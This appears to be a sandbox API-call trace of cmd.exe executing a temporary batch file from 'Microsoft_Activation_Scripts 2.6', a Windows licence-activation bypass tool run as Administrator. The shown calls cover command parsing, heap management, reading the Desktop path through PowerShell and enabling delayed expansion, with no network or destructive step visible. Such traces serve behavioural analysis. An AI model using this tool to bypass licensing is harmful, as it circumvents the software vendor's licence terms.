[0180.153] GetLastError () returned 0x2 [0180.153] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.153] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\set.*" (normalized: "c:\\windows\\system32\\set.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe230) returned 0xffffffffffffffff [0180.154] GetLastError () returned 0x2 [0180.154] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.154] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\set.*" (normalized: "c:\\windows\\system32\\wbem\\set.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe230) returned 0xffffffffffffffff [0180.154] GetLastError () returned 0x2 [0180.154] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.154] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\set.*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe230) returned 0xffffffffffffffff [0180.155] GetLastError () returned 0x2 [0180.155] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe510, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.155] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0180.155] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0180.155] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0180.155] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0180.155] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0180.155] _wcsicmp (_String1="set", _String2="CD") returned 16 [0180.155] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0180.155] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0180.155] _wcsicmp (_String1="set", _String2="REN") returned 1 [0180.155] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0180.155] _wcsicmp (_String1="set", _String2="SET") returned 0 [0180.155] GetProcessHeap () returned 0x19a8f1e0000 [0180.155] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbc) returned 0x19a8f1f9f80 [0180.155] GetProcessHeap () returned 0x19a8f1e0000 [0180.155] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0x66) returned 0x19a8f1f9f80 [0180.155] GetProcessHeap () returned 0x19a8f1e0000 [0180.155] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0x66 [0180.156] wcsncmp (_String1="\"_de", _String2="/", _MaxCount=0x4) returned -13 [0180.156] GetProcessHeap () returned 0x19a8f1e0000 [0180.156] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6e) returned 0x19a8f1ef6a0 [0180.156] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0180.156] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0180.156] SetEnvironmentVariableW (lpName="_desktop_", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0180.156] GetProcessHeap () returned 0x19a8f1e0000 [0180.156] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0180.156] GetEnvironmentStringsW () returned 0x19a8f209820* [0180.156] GetProcessHeap () returned 0x19a8f1e0000 [0180.157] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x100e) returned 0x19a8f20a840 [0180.157] memcpy (in: _Dst=0x19a8f20a840, _Src=0x19a8f209820, _Size=0x100e | out: _Dst=0x19a8f20a840) returned 0x19a8f20a840 [0180.157] FreeEnvironmentStringsA (penv="=") returned 1 [0180.157] GetProcessHeap () returned 0x19a8f1e0000 [0180.157] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0180.157] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.157] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.157] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.157] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.158] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.158] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.158] SetConsoleInputExeNameW () returned 0x1 [0180.158] GetConsoleOutputCP () returned 0x1b5 [0180.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.159] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.159] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.159] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.159] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8790, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2256 [0180.159] GetProcessHeap () returned 0x19a8f1e0000 [0180.159] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef6a0) returned 1 [0180.159] GetProcessHeap () returned 0x19a8f1e0000 [0180.160] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0180.160] GetProcessHeap () returned 0x19a8f1e0000 [0180.160] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0180.160] GetProcessHeap () returned 0x19a8f1e0000 [0180.160] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0180.160] GetProcessHeap () returned 0x19a8f1e0000 [0180.161] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fabf0) returned 1 [0180.161] GetProcessHeap () returned 0x19a8f1e0000 [0180.161] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200f30) returned 1 [0180.161] GetProcessHeap () returned 0x19a8f1e0000 [0180.161] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea990) returned 1 [0180.162] GetProcessHeap () returned 0x19a8f1e0000 [0180.162] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb00) returned 1 [0180.162] GetProcessHeap () returned 0x19a8f1e0000 [0180.162] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0180.162] GetProcessHeap () returned 0x19a8f1e0000 [0180.162] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20bc10) returned 1 [0180.162] GetProcessHeap () returned 0x19a8f1e0000 [0180.163] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea920) returned 1 [0180.163] GetProcessHeap () returned 0x19a8f1e0000 [0180.163] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.163] GetProcessHeap () returned 0x19a8f1e0000 [0180.163] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20da00) returned 1 [0180.164] GetProcessHeap () returned 0x19a8f1e0000 [0180.164] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.164] GetProcessHeap () returned 0x19a8f1e0000 [0180.164] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6e0) returned 1 [0180.164] GetProcessHeap () returned 0x19a8f1e0000 [0180.164] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0180.164] GetProcessHeap () returned 0x19a8f1e0000 [0180.164] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0180.164] GetProcessHeap () returned 0x19a8f1e0000 [0180.165] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ac0) returned 1 [0180.165] GetProcessHeap () returned 0x19a8f1e0000 [0180.165] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09f0) returned 1 [0180.165] GetProcessHeap () returned 0x19a8f1e0000 [0180.165] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.165] GetProcessHeap () returned 0x19a8f1e0000 [0180.166] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0180.166] GetProcessHeap () returned 0x19a8f1e0000 [0180.166] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0180.166] GetProcessHeap () returned 0x19a8f1e0000 [0180.167] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9180) returned 1 [0180.167] GetProcessHeap () returned 0x19a8f1e0000 [0180.167] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0180.167] GetProcessHeap () returned 0x19a8f1e0000 [0180.167] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8880) returned 1 [0180.167] GetProcessHeap () returned 0x19a8f1e0000 [0180.167] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0180.168] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.168] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2256 [0180.168] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.168] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8938, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x22ea [0180.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _desktop_ for /f \"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n", cbMultiByte=148, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if not defined _desktop_ for /f \"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 148 [0180.168] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.168] GetFileType (hFile=0x9c) returned 0x1 [0180.168] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.168] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22ea [0180.168] GetProcessHeap () returned 0x19a8f1e0000 [0180.168] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.168] GetProcessHeap () returned 0x19a8f1e0000 [0180.168] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0180.169] GetProcessHeap () returned 0x19a8f1e0000 [0180.169] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0180.169] GetEnvironmentVariableW (in: lpName="psc", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xe [0180.169] GetProcessHeap () returned 0x19a8f1e0000 [0180.169] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0180.169] GetProcessHeap () returned 0x19a8f1e0000 [0180.169] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0180.170] GetProcessHeap () returned 0x19a8f1e0000 [0180.170] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.171] _wcsicmp (_String1="if", _String2=")") returned 64 [0180.171] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0180.171] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0180.171] _wcsicmp (_String1="IF", _String2="if") returned 0 [0180.171] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0180.171] GetProcessHeap () returned 0x19a8f1e0000 [0180.171] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecba0 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb980 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb980, Size=0x1a) returned 0x19a8f1eb800 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1a [0180.172] _wcsicmp (_String1="not", _String2="/I") returned 63 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6a0 [0180.172] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0180.172] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0180.172] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0180.172] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0180.172] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0180.172] GetProcessHeap () returned 0x19a8f1e0000 [0180.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb860 [0180.173] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0180.173] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0180.173] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0180.173] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb770 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b70 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0b70, Size=0x26) returned 0x19a8f1eb8f0 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x26 [0180.173] _wcsicmp (_String1="for", _String2=")") returned 61 [0180.173] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0180.173] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8c40 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0180.173] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x1a) returned 0x19a8f1eb710 [0180.174] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x1a [0180.174] _wcsicmp (_String1="/L", _String2="/f") returned 6 [0180.174] _wcsicmp (_String1="/D", _String2="/f") returned -2 [0180.174] _wcsicmp (_String1="/F", _String2="/f") returned 0 [0180.174] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0f70 [0180.174] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0180.174] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0180.174] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0180.174] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0180.174] _wcsicmp (_String1="IN", _String2="in") returned 0 [0180.174] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0c70 [0180.174] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0c70, Size=0xaa) returned 0x19a8f1ede90 [0180.174] GetProcessHeap () returned 0x19a8f1e0000 [0180.174] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ede90) returned 0xaa [0180.176] _wcsicmp (_String1="DO", _String2="do") returned 0 [0180.177] _wcsicmp (_String1="call", _String2=")") returned 58 [0180.177] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0180.177] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0180.177] _wcsicmp (_String1="IF", _String2="call") returned 6 [0180.177] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0180.177] _wcsicmp (_String1="REM", _String2="call") returned 15 [0180.177] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0180.177] GetProcessHeap () returned 0x19a8f1e0000 [0180.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0180.177] GetProcessHeap () returned 0x19a8f1e0000 [0180.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0180.177] GetProcessHeap () returned 0x19a8f1e0000 [0180.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a30 [0180.177] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0180.177] _tell (_FileHandle=3) returned 8938 [0180.177] _close (_FileHandle=3) returned 0 [0180.178] GetEnvironmentVariableW (in: lpName="_desktop_", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1d [0180.178] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.178] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.180] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.180] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.181] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.181] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.181] SetConsoleInputExeNameW () returned 0x1 [0180.181] GetConsoleOutputCP () returned 0x1b5 [0180.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.182] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.183] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.183] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8938, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x22ea [0180.183] GetProcessHeap () returned 0x19a8f1e0000 [0180.184] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a30) returned 1 [0180.184] GetProcessHeap () returned 0x19a8f1e0000 [0180.184] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.184] GetProcessHeap () returned 0x19a8f1e0000 [0180.185] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0180.185] GetProcessHeap () returned 0x19a8f1e0000 [0180.186] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0180.186] GetProcessHeap () returned 0x19a8f1e0000 [0180.186] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0180.186] GetProcessHeap () returned 0x19a8f1e0000 [0180.186] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0180.186] GetProcessHeap () returned 0x19a8f1e0000 [0180.187] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8c40) returned 1 [0180.188] GetProcessHeap () returned 0x19a8f1e0000 [0180.188] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0180.188] GetProcessHeap () returned 0x19a8f1e0000 [0180.189] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.189] GetProcessHeap () returned 0x19a8f1e0000 [0180.189] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0180.189] GetProcessHeap () returned 0x19a8f1e0000 [0180.190] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0180.190] GetProcessHeap () returned 0x19a8f1e0000 [0180.190] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0180.191] GetProcessHeap () returned 0x19a8f1e0000 [0180.191] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6a0) returned 1 [0180.191] GetProcessHeap () returned 0x19a8f1e0000 [0180.192] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0180.192] GetProcessHeap () returned 0x19a8f1e0000 [0180.192] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0180.192] GetProcessHeap () returned 0x19a8f1e0000 [0180.192] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecba0) returned 1 [0180.192] GetProcessHeap () returned 0x19a8f1e0000 [0180.193] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0180.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22ea [0180.193] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8940, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x22ec [0180.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n not defined _desktop_ for /f \"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 2 [0180.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.193] GetFileType (hFile=0x9c) returned 0x1 [0180.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22ec [0180.194] GetProcessHeap () returned 0x19a8f1e0000 [0180.194] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.194] GetProcessHeap () returned 0x19a8f1e0000 [0180.195] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.195] _tell (_FileHandle=3) returned 8940 [0180.195] _close (_FileHandle=3) returned 0 [0180.196] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.196] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8940, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x22ec [0180.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22ec [0180.196] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=8973, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x230d [0180.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\ndelims=\" %%a in ('%psc% \"& {write-host 